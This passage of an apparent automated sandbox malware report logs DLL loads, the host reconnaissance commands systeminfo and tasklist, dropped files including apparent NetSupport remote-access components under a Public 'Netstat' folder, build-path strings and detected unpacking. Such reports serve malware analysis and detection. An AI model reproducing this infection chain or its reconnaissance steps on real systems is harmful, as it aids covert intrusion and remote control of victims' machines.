                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: onex.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: slc.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dll
                                Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
                                Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windowscodecs.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
                                Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dll
                                Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dll
                                Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
                                Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
                                Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
                                Source: C:\Windows\System32\getmac.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\getmac.exeSection loaded: wkscli.dll
                                Source: C:\Windows\System32\getmac.exeSection loaded: netutils.dll
                                Source: C:\Windows\System32\getmac.exeSection loaded: mpr.dll
                                Source: C:\Windows\System32\getmac.exeSection loaded: framedynos.dll
                                Source: C:\Windows\System32\getmac.exeSection loaded: srvcli.dll
                                Source: C:\Windows\System32\getmac.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\getmac.exeSection loaded: uxtheme.dll
                                Source: C:\Windows\System32\getmac.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\System32\getmac.exeSection loaded: amsi.dll
                                Source: C:\Windows\System32\getmac.exeSection loaded: userenv.dll
                                Source: C:\Windows\System32\getmac.exeSection loaded: profapi.dll
                                Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dll
                                Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
                                Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
                                Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dll
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dll
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dll
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dll
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dll
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exeSection loaded: version.dll
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exeSection loaded: dxgidebug.dll
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exeSection loaded: sfc_os.dll
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exeSection loaded: sspicli.dll
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exeSection loaded: rsaenh.dll
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exeSection loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exeSection loaded: dwmapi.dll
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exeSection loaded: cryptbase.dll
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exeSection loaded: riched20.dll
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exeSection loaded: usp10.dll
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exeSection loaded: msls31.dll
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exeSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exeSection loaded: windowscodecs.dll
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exeSection loaded: textshaping.dll
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exeSection loaded: textinputframework.dll
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exeSection loaded: coreuicomponents.dll
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exeSection loaded: coremessaging.dll
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exeSection loaded: ntmarta.dll
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exeSection loaded: coremessaging.dll
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exeSection loaded: wintypes.dll
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exeSection loaded: wintypes.dll
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exeSection loaded: wintypes.dll
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exeSection loaded: windows.storage.dll
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exeSection loaded: wldp.dll
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exeSection loaded: propsys.dll
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exeSection loaded: profapi.dll
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exeSection loaded: edputil.dll
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exeSection loaded: urlmon.dll
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exeSection loaded: iertutil.dll
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exeSection loaded: srvcli.dll
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exeSection loaded: netutils.dll
                                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exeFile written: C:\Users\Public\Netstat\client32.ini
                                Source: C:\Users\Public\Netstat\FuturreApp.exeFile opened: C:\Windows\SysWOW64\riched32.dll
                                Source: Window RecorderWindow detected: More than 3 window changes detected
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                                Source: file.exeStatic file information: File size 3037184 > 1048576
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exeFile opened: C:\Users\Public\Netstat\msvcr100.dll
                                Source: file.exeStatic PE information: Raw size of uyplpdnx is bigger than: 0x100000 < 0x2b3e00
                                Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: m9sfEU9.exe, 00000051.00000000.2623878059.0000000000160000.00000002.00000001.01000000.0000001F.sdmp, m9sfEU9.exe, 00000051.00000002.2648520740.0000000000160000.00000002.00000001.01000000.0000001F.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdb source: FuturreApp.exe, 00000055.00000002.7290420572.000000006C002000.00000002.00000001.01000000.00000024.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: m9sfEU9.exe, 00000051.00000003.2634727930.0000000003045000.00000004.00000020.00020000.00000000.sdmp, FuturreApp.exe, 00000055.00000002.7286857048.0000000011193000.00000002.00000001.01000000.00000023.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: D1UL0FG.exe, 00000006.00000002.3002205748.00007FF8A873C000.00000040.00000001.01000000.0000001A.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: FuturreApp.exe, 00000055.00000002.7288711538.000000006BD70000.00000002.00000001.01000000.00000027.sdmp
                                Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_A source: D1UL0FG.exe
                                Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbMM source: D1UL0FG.exe, 00000006.00000002.3011719584.00007FF8B916B000.00000040.00000001.01000000.0000000F.sdmp
                                Source: Binary string: D:\a\1\b\libssl-1_1.pdb@@ source: D1UL0FG.exe, 00000006.00000002.3007572245.00007FF8A9356000.00000040.00000001.01000000.00000017.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\client32\Release\client32.pdb source: FuturreApp.exe, 00000055.00000000.2642607921.0000000000922000.00000002.00000001.01000000.00000022.sdmp, FuturreApp.exe, 00000055.00000002.7276259050.0000000000922000.00000002.00000001.01000000.00000022.sdmp
                                Source: Binary string: C:\Users\danie\source\repos\NewText\NewText\obj\Debug\NewTextV2.pdb source: skotes.exe, 00000003.00000003.5971400666.00000000013E8000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7286155793.00000000013E8000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: D1UL0FG.exe, 00000006.00000002.3002970846.00007FF8A89A0000.00000040.00000001.01000000.00000016.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: D1UL0FG.exe, D1UL0FG.exe, 00000006.00000002.3008113833.00007FF8B8281000.00000040.00000001.01000000.00000012.sdmp
                                Source: Binary string: D:\a\1\b\libcrypto-1_1.pdb source: D1UL0FG.exe, D1UL0FG.exe, 00000006.00000002.3002970846.00007FF8A8A22000.00000040.00000001.01000000.00000016.sdmp
                                Source: Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: rar.exe, 00000063.00000002.2839636582.00007FF62B1A0000.00000002.00000001.01000000.0000002A.sdmp
                                Source: Binary string: D:\a\1\b\libssl-1_1.pdb source: D1UL0FG.exe, D1UL0FG.exe, 00000006.00000002.3007572245.00007FF8A9356000.00000040.00000001.01000000.00000017.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: D1UL0FG.exe, D1UL0FG.exe, 00000006.00000002.3013531293.00007FF8BFAD1000.00000040.00000001.01000000.00000014.sdmp
                                Source: Binary string: 8C:\Users\user\AppData\Local\Temp\l2sopuet\l2sopuet.pdbhP source: powershell.exe, 00000037.00000002.2645286273.0000021F95B72000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: msvcr100.i386.pdb source: m9sfEU9.exe, 00000051.00000003.2634727930.0000000003045000.00000004.00000020.00020000.00000000.sdmp, FuturreApp.exe, 00000055.00000002.7289151898.000000006BF21000.00000020.00000001.01000000.00000026.sdmp
                                Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1t 7 Feb 2023built on: Thu Feb 9 15:27:40 2023 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-1_1"not available source: D1UL0FG.exe, 00000006.00000002.3002970846.00007FF8A89A0000.00000040.00000001.01000000.00000016.sdmp
                                Source: Binary string: d:\a01\_work\12\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: D1UL0FG.exe, 00000005.00000003.2466075988.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000002.3014816312.00007FF8BFBA1000.00000002.00000001.01000000.0000000C.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: D1UL0FG.exe, D1UL0FG.exe, 00000006.00000002.3014453254.00007FF8BFB61000.00000040.00000001.01000000.0000000D.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: D1UL0FG.exe, D1UL0FG.exe, 00000006.00000002.3008792565.00007FF8B90E1000.00000040.00000001.01000000.00000018.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\python310.pdb source: D1UL0FG.exe, 00000006.00000002.3005171596.00007FF8A8E0F000.00000040.00000001.01000000.0000000B.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: D1UL0FG.exe, D1UL0FG.exe, 00000006.00000002.3013206314.00007FF8BFAB1000.00000040.00000001.01000000.00000019.sdmp
                                Source: Binary string: C:\Users\danie\source\repos\NewText\NewText\obj\Debug\NewTextV2.pdbdj~j pj_CorExeMainmscoree.dll source: skotes.exe, 00000003.00000003.5971400666.00000000013E8000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7286155793.00000000013E8000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: D1UL0FG.exe, 00000006.00000002.3011719584.00007FF8B916B000.00000040.00000001.01000000.0000000F.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: D1UL0FG.exe, 00000005.00000003.2466240727.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000002.3012961847.00007FF8BA24D000.00000002.00000001.01000000.00000010.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: FuturreApp.exe, 00000055.00000002.7288711538.000000006BD70000.00000002.00000001.01000000.00000027.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: FuturreApp.exe, 00000055.00000002.7289981712.000000006BFE5000.00000002.00000001.01000000.00000025.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: D1UL0FG.exe, D1UL0FG.exe, 00000006.00000002.3011122158.00007FF8B9131000.00000040.00000001.01000000.00000013.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: D1UL0FG.exe, D1UL0FG.exe, 00000006.00000002.3012153000.00007FF8B93C1000.00000040.00000001.01000000.00000011.sdmp
                                Source: Binary string: C:\Users\danie\source\repos\NewText\NewText\obj\Debug\NewText.pdb source: skotes.exe, 00000003.00000002.7285940039.0000000001390000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000003.5971400666.0000000001402000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7286155793.0000000001402000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: D1UL0FG.exe, D1UL0FG.exe, 00000006.00000002.3010460517.00007FF8B9101000.00000040.00000001.01000000.00000015.sdmp
                                Source: Binary string: 8C:\Users\user\AppData\Local\Temp\l2sopuet\l2sopuet.pdb source: powershell.exe, 00000037.00000002.2645286273.0000021F95B72000.00000004.00000800.00020000.00000000.sdmp

                                Data Obfuscation

                                barindex
                                Detected unpacking (changes PE section rights)
                                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.260000.0.unpack :EW;.rsrc:W;.idata :W;uyplpdnx:EW;lxepjdzt:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;uyplpdnx:EW;lxepjdzt:EW;.taggant:EW;
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 2.2.skotes.exe.690000.0.unpack :EW;.rsrc:W;.idata :W;uyplpdnx:EW;lxepjdzt:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;uyplpdnx:EW;lxepjdzt:EW;.taggant:EW;
